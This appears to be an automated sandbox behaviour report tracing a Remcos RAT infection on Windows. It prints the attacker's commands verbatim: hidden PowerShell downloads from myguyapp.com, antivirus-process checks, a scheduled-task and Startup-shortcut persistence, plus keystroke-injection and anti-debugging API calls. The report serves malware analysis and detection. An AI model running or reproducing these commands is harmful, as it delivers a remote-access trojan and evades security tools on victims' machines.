Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: svchost.exe, 00000007.00000002.2572815474.000001AA0302B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: svchost.exe, 00000007.00000002.2574598671.000001AA08458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BBF4FF BlockInput,

33_2_00BBF4FF

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

33_2_00B4338B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_00406328

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B65058 mov eax, dword ptr fs:[00000030h]

33_2_00B65058

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BA20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

33_2_00BA20AA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B72992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00B72992
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B60BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00B60BAF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B60D45 SetUnhandledExceptionFilter,	33_2_00B60D45
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B60F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00B60F91

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

33_2_00BA1B4D

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

33_2_00B4338B

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BABBED SendInput,keybd_event,

33_2_00BABBED

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BAEC9E mouse_event,

33_2_00BAEC9E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & echo url="c:\users\user\appdata\local\mediafusion technologies inc\cineblend.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cineblend.url" & exit

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BA14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

33_2_00BA14AE

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BA1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

33_2_00BA1FB0

Source: Prostores.com, 00000019.00000000.1775020071.0000000000543000.00000002.00000001.01000000.00000009.sdmp, Prostores.com, 00000019.00000003.1782508757.0000000003B57000.00000004.00000800.00020000.00000000.sdmp, CineBlend.scr, 00000021.00000000.1793808073.0000000000C03000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CineBlend.scr	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B60A08 cpuid

33_2_00B60A08

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B9E5F4 GetLocalTime,

33_2_00B9E5F4

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B9E652 GetUserNameW,

33_2_00B9E652

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00B7BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

33_2_00B7BCD2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

15_2_00406831

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: CineBlend.scr	Binary or memory string: WIN_81
Source: CineBlend.scr	Binary or memory string: WIN_XP
Source: CineBlend.scr, 00000025.00000002.1933168196.0000000000C03000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: CineBlend.scr	Binary or memory string: WIN_XPe
Source: CineBlend.scr	Binary or memory string: WIN_VISTA
Source: CineBlend.scr	Binary or memory string: WIN_7
Source: CineBlend.scr	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT
